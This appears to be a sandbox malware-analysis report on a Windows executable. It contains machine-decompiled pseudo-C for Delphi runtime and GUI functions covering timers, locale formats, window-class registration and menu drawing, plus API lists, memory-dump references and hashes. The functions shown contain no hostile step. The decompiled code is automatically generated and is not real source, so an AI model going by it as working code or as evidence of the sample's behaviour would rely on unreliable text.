                                                                                0x0045f1c0
                                                                                0x0045f18e
                                                                                0x0045f146
                                                                                0x0045f134
                                                                                0x0045f122
                                                                                0x00000000
                                                                                0x0045f118
                                                                                0x0045f05a
                                                                                0x0045f05e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f064
                                                                                0x0045f06d
                                                                                0x0045f070
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f07f
                                                                                0x0045f082
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f08b
                                                                                0x0045f08e
                                                                                0x0045f097
                                                                                0x0045f0a5
                                                                                0x0045f0ad
                                                                                0x0045f0c7
                                                                                0x0045f0cc
                                                                                0x0045f0ce
                                                                                0x0045f0d7
                                                                                0x0045f0e3
                                                                                0x0045f0ec
                                                                                0x0045f0f1
                                                                                0x0045f104
                                                                                0x0045f104
                                                                                0x00000000
                                                                                0x0045f0ce
                                                                                0x0045ef90
                                                                                0x0045ef99
                                                                                0x0045ef9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045efa2
                                                                                0x0045efa5
                                                                                0x0045efac
                                                                                0x0045f003
                                                                                0x0045f019
                                                                                0x0045f01e
                                                                                0x0045f022
                                                                                0x0045f040
                                                                                0x0045f024
                                                                                0x0045f02a
                                                                                0x0045f02a
                                                                                0x00000000
                                                                                0x0045f022
                                                                                0x0045efae
                                                                                0x0045efb7
                                                                                0x0045efba
                                                                                0x0045efbc
                                                                                0x0045efd6
                                                                                0x0045efe2
                                                                                0x0045efea
                                                                                0x0045efef
                                                                                0x0045eff6
                                                                                0x00000000
                                                                                0x0045eff6
                                                                                0x0045efc7
                                                                                0x0045efca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045efcf
                                                                                0x00000000
                                                                                0x0045efcf
                                                                                0x0045eeb3
                                                                                0x0045eeb7
                                                                                0x00000000
                                                                                0x0045eeb9
                                                                                0x0045eec0
                                                                                0x00000000
                                                                                0x0045eec0
                                                                                0x0045eeb7
                                                                                0x0045ee7b
                                                                                0x0045ee89
                                                                                0x0045ee8e
                                                                                0x0045ee97
                                                                                0x0045ee9c
                                                                                0x0045ee9e
                                                                                0x00000000
                                                                                0x0045eea5
                                                                                0x00000000
                                                                                0x0045ee9e
                                                                                0x0045ee80
                                                                                0x0045ee85
                                                                                0x0045ee87
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F019
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F104
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F1C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Timer
                                                                                • String ID: @
                                                                                • API String ID: 2870079774-2766056989
                                                                                • Opcode ID: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction ID: 31ec200aa90f8bbc8c52e6f19b9a0b11fb317160e962f7965f8f07b22054e6eb
                                                                                • Opcode Fuzzy Hash: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction Fuzzy Hash: 3AC13D34A00209EFDB10DB99C589BDEB7F5AF44305F2441A6EC04AB392D778AF49DB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409C40, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E00409C40(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404320(__edx);
				E00409908(GetThreadLocale(), 0x409e20, 0x1009,  &_v12);
				if(E00408708(0x409e20, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004045D8(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x46b0c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408C80(_t124 + _t92 - 1, 2, 0x409e24);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408C80(_t124 + _t92 - 1, 4, 0x409e34);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408C80(_t124 + _t92 - 1, 2, 0x409e4c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004045E0(_t122, 0x409e64);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404500();
												E004045E0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004045E0(_t122, 0x409e58);
										_t92 = _t92 + 1;
									}
								} else {
									E004045E0(_t122, 0x409e44);
									_t92 = _t92 + 3;
								}
							} else {
								E004045E0(_t122, 0x409e30);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040A988(_t124, _t92);
							E00404830(_t124, _v8, _t92,  &_v20);
							E004045E0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4877f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404374(_t122, _t124);
					} else {
						while(_t92 <= E004045D8(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404500();
									E004045E0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409E11);
				return E00404344( &_v24, 4);
			}























                                                                                0x00409c40
                                                                                0x00409c45
                                                                                0x00409c46
                                                                                0x00409c47
                                                                                0x00409c48
                                                                                0x00409c49
                                                                                0x00409c4d
                                                                                0x00409c4f
                                                                                0x00409c53
                                                                                0x00409c54
                                                                                0x00409c59
                                                                                0x00409c5c
                                                                                0x00409c5f
                                                                                0x00409c66
                                                                                0x00409c7e
                                                                                0x00409c96
                                                                                0x00409de0
                                                                                0x00409de2
                                                                                0x00409de7
                                                                                0x00409de9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409cff
                                                                                0x00409d04
                                                                                0x00409d0b
                                                                                0x00409d49
                                                                                0x00409d4e
                                                                                0x00409d50
                                                                                0x00409d6f
                                                                                0x00409d74
                                                                                0x00409d76
                                                                                0x00409d97
                                                                                0x00409d9c
                                                                                0x00409d9e
                                                                                0x00409db3
                                                                                0x00409db3
                                                                                0x00409db5
                                                                                0x00409dbb
                                                                                0x00409dc2
                                                                                0x00409db7
                                                                                0x00409db7
                                                                                0x00409db9
                                                                                0x00409dd0
                                                                                0x00409dda
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409db9
                                                                                0x00409da0
                                                                                0x00409da7
                                                                                0x00409dac
                                                                                0x00409dac
                                                                                0x00409d78
                                                                                0x00409d7f
                                                                                0x00409d84
                                                                                0x00409d84
                                                                                0x00409d52
                                                                                0x00409d59
                                                                                0x00409d5e
                                                                                0x00409d5e
                                                                                0x00409ddf
                                                                                0x00409ddf
                                                                                0x00409d0d
                                                                                0x00409d16
                                                                                0x00409d24
                                                                                0x00409d2e
                                                                                0x00409d33
                                                                                0x00409d33
                                                                                0x00409d0b
                                                                                0x00409c9c
                                                                                0x00409c9c
                                                                                0x00409ca1
                                                                                0x00409ca4
                                                                                0x00409cb2
                                                                                0x00409cae
                                                                                0x00409cae
                                                                                0x00409cae
                                                                                0x00409cb6
                                                                                0x00409cf1
                                                                                0x00409cb8
                                                                                0x00409cdd
                                                                                0x00409cbe
                                                                                0x00409cbe
                                                                                0x00409cc0
                                                                                0x00409cc2
                                                                                0x00409cc4
                                                                                0x00409ccd
                                                                                0x00409cd7
                                                                                0x00409cd7
                                                                                0x00409cc4
                                                                                0x00409cdc
                                                                                0x00409cdc
                                                                                0x00409cdc
                                                                                0x00409ce8
                                                                                0x00409cb6
                                                                                0x00409def
                                                                                0x00409df1
                                                                                0x00409df4
                                                                                0x00409df7
                                                                                0x00409e09

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409E0A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409C6F
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction ID: 1a36ec5943870a74506374bfa0bb250890d6a6f3bc275ed72c2f61215dc1fb70
                                                                                • Opcode Fuzzy Hash: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction Fuzzy Hash: C441E4B47081055BD715EB6AC8816BFB2A6DF84304B64453BE692B33C7EB3C9D02926D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00438E24, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00438E24(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x438faf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004324CC != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004324CC;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B264(_t83, _t84, _t98, _t100);
						}
					}
					 *0x46b8d0 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B264(_t83, _t85, _t98, _t100);
					}
					E00408D84( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043C024(_t100);
					E00436848(_t100, E0041EB60( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037B0(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x438fb6);
					return E00404320( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x486ca0; // 0x41cc64
						E00406520(_t75,  &_v196);
						_t84 = _v196;
						E0040A0EC(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403D80();
					} else {
						_t97 =  *0x4317f8; // 0x431844
						if(E00403740(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043BD14(_t83);
					}
					goto L7;
				}
			}




















                                                                                0x00438e24
                                                                                0x00438e24
                                                                                0x00438e2d
                                                                                0x00438e31
                                                                                0x00438e37
                                                                                0x00438e3b
                                                                                0x00438e3c
                                                                                0x00438e41
                                                                                0x00438e44
                                                                                0x00438e4f
                                                                                0x00438e51
                                                                                0x00438e5b
                                                                                0x00438ed0
                                                                                0x00438ed3
                                                                                0x00438ee8
                                                                                0x00438ef0
                                                                                0x00438ef2
                                                                                0x00438ef5
                                                                                0x00438f06
                                                                                0x00438f10
                                                                                0x00438f10
                                                                                0x00438f15
                                                                                0x00438f1f
                                                                                0x00438f2e
                                                                                0x00438f30
                                                                                0x00438f30
                                                                                0x00438f2e
                                                                                0x00438f35
                                                                                0x00438f43
                                                                                0x00438f45
                                                                                0x00438f52
                                                                                0x00438f54
                                                                                0x00438f54
                                                                                0x00438f5c
                                                                                0x00438f63
                                                                                0x00438f68
                                                                                0x00438f80
                                                                                0x00438f85
                                                                                0x00438f89
                                                                                0x00438f91
                                                                                0x00438f91
                                                                                0x00438f98
                                                                                0x00438f9b
                                                                                0x00438f9e
                                                                                0x00438fae
                                                                                0x00438e66
                                                                                0x00438e66
                                                                                0x00438e6b
                                                                                0x00438e90
                                                                                0x00438e93
                                                                                0x00438e99
                                                                                0x00438eaf
                                                                                0x00438eb4
                                                                                0x00438eb9
                                                                                0x00438ec6
                                                                                0x00438ecb
                                                                                0x00438e73
                                                                                0x00438e75
                                                                                0x00438e82
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00438e8b
                                                                                0x00438e8b
                                                                                0x00000000
                                                                                0x00438e6b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction ID: 9ca51f5f29ae1eb14152c1338e28f16d362e04c9e494997458acfa82f7e2cf98
                                                                                • Opcode Fuzzy Hash: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction Fuzzy Hash: 81416D70A003088BDB21EB65C841B9AB7FAAF48304F0445AEE549E7391DB78AD44CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004099B8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E004099B8(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409acb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x487758;
				_t83 = 0x487788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E0040997C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00404374(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E0040997C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00404374(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x4877b8;
				_t84 = 0x4877d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E0040997C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00404374(_t87, _v24);
					E0040997C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00404374(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409AD2);
				return E00404344( &_v28, 4);
			}

















                                                                                0x004099b9
                                                                                0x004099bd
                                                                                0x004099be
                                                                                0x004099bf
                                                                                0x004099c0
                                                                                0x004099c1
                                                                                0x004099c2
                                                                                0x004099c8
                                                                                0x004099c9
                                                                                0x004099ce
                                                                                0x004099d1
                                                                                0x004099d9
                                                                                0x004099dc
                                                                                0x004099e1
                                                                                0x004099e6
                                                                                0x004099eb
                                                                                0x004099fa
                                                                                0x004099fe
                                                                                0x00409a09
                                                                                0x00409a1d
                                                                                0x00409a21
                                                                                0x00409a2c
                                                                                0x00409a31
                                                                                0x00409a32
                                                                                0x00409a35
                                                                                0x00409a38
                                                                                0x00409a3d
                                                                                0x00409a42
                                                                                0x00409a47
                                                                                0x00409a4c
                                                                                0x00409a4c
                                                                                0x00409a54
                                                                                0x00409a57
                                                                                0x00409a6f
                                                                                0x00409a7a
                                                                                0x00409a94
                                                                                0x00409a9f
                                                                                0x00409aa4
                                                                                0x00409aa5
                                                                                0x00409aa8
                                                                                0x00409aab
                                                                                0x00409ab2
                                                                                0x00409ab5
                                                                                0x00409ab8
                                                                                0x00409aca

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00409ACB,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: Dv@$|v@$u@
                                                                                • API String ID: 635194068-2345670339
                                                                                • Opcode ID: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction ID: 09a08a330bd4a45439277aa33b1eaf094ed5bc7a83b6c8959b739365ddb57b32
                                                                                • Opcode Fuzzy Hash: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction Fuzzy Hash: B431B6B1B001086BDB00DA55C891EAF77A9D789314F61843BEA09E7381D73DED4187A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455CC0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00455CC0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x455dce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t4 =  &_v8; // 0x455438
				_t55 = E00455C3C( *_t4);
				_t5 =  &_v8; // 0x455438
				if( *((char*)( *_t5 + 0x88)) != 0) {
					_t7 =  &_v8; // 0x455438
					_t51 =  *_t7;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						_t9 =  &_v8; // 0x455438
						E00456214( *_t9);
					}
				}
				E00453DC8(_t55,  &_v20);
				E00432818(_v20, 0,  &_v16, _t79);
				_t36 =  *0x487bfc; // 0x2291310
				E00455E7C(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x455d77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t15 =  &_v8; // 0x455438
				if( *((short*)( *_t15 + 0xea)) != 0) {
					_t18 =  &_v8; // 0x455438
					 *((intOrPtr*)( *_t18 + 0xe8))();
				}
				if(_v9 != 0) {
					E00455BD8();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x486dcc; // 0x487030
				if(_t41 ==  *_t67 && E0041B790() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00455DD5);
				return E00404344( &_v20, 2);
			}

















                                                                                0x00455cc1
                                                                                0x00455cc3
                                                                                0x00455ccb
                                                                                0x00455cce
                                                                                0x00455cd1
                                                                                0x00455cd6
                                                                                0x00455cd7
                                                                                0x00455cdc
                                                                                0x00455cdf
                                                                                0x00455ce2
                                                                                0x00455cea
                                                                                0x00455cec
                                                                                0x00455cf6
                                                                                0x00455cf8
                                                                                0x00455cf8
                                                                                0x00455cfb
                                                                                0x00455cff
                                                                                0x00455d01
                                                                                0x00455d04
                                                                                0x00455d04
                                                                                0x00455cff
                                                                                0x00455d0e
                                                                                0x00455d19
                                                                                0x00455d21
                                                                                0x00455d26
                                                                                0x00455d2b
                                                                                0x00455d31
                                                                                0x00455d32
                                                                                0x00455d37
                                                                                0x00455d3a
                                                                                0x00455d3d
                                                                                0x00455d48
                                                                                0x00455d4d
                                                                                0x00455d59
                                                                                0x00455d59
                                                                                0x00455d63
                                                                                0x00455d68
                                                                                0x00455d68
                                                                                0x00455d6f
                                                                                0x00455d72
                                                                                0x00455d8c
                                                                                0x00455d91
                                                                                0x00455d99
                                                                                0x00455da4
                                                                                0x00455da4
                                                                                0x00455dac
                                                                                0x00455dae
                                                                                0x00455dae
                                                                                0x00455db5
                                                                                0x00455db8
                                                                                0x00455dbb
                                                                                0x00455dcd

                                                                                APIs
                                                                                  • Part of subcall function 00455C3C: GetCursorPos.USER32 ref: 00455C45
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00455D8C
                                                                                • WaitMessage.USER32(00000000,00455DCE,?,?,?,0046AE10), ref: 00455DAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentCursorMessageThreadWait
                                                                                • String ID: 0pH$8TE
                                                                                • API String ID: 535285469-2347222379
                                                                                • Opcode ID: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction ID: ef179845760a388f2d3b94f2e4396c7f7e61d99bb3ed3a3471b4b2a0e5122e17
                                                                                • Opcode Fuzzy Hash: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction Fuzzy Hash: FE31A430A04648EFDB01DB95D855BAEB7F5EB45305F6184BAEC00A7392D7786E0CCB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00448B18, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00448B18(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x486dd0; // 0x4877f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00448E9C(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                                0x00448b1a
                                                                                0x00448b1d
                                                                                0x00448b1f
                                                                                0x00448b28
                                                                                0x00448b3f
                                                                                0x00448b41
                                                                                0x00448b48
                                                                                0x00448b54
                                                                                0x00448b58
                                                                                0x00448b66
                                                                                0x00448b6d
                                                                                0x00448b71
                                                                                0x00448b83
                                                                                0x00448b88
                                                                                0x00448ba6
                                                                                0x00448baa
                                                                                0x00448bb8
                                                                                0x00448bbf
                                                                                0x00000000
                                                                                0x00448bc5
                                                                                0x00448bbf
                                                                                0x00448b88
                                                                                0x00448b6d
                                                                                0x00448bd2

                                                                                APIs
                                                                                • GetMenuItemInfoA.USER32 ref: 00448B66
                                                                                • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448BB8
                                                                                • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448BC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
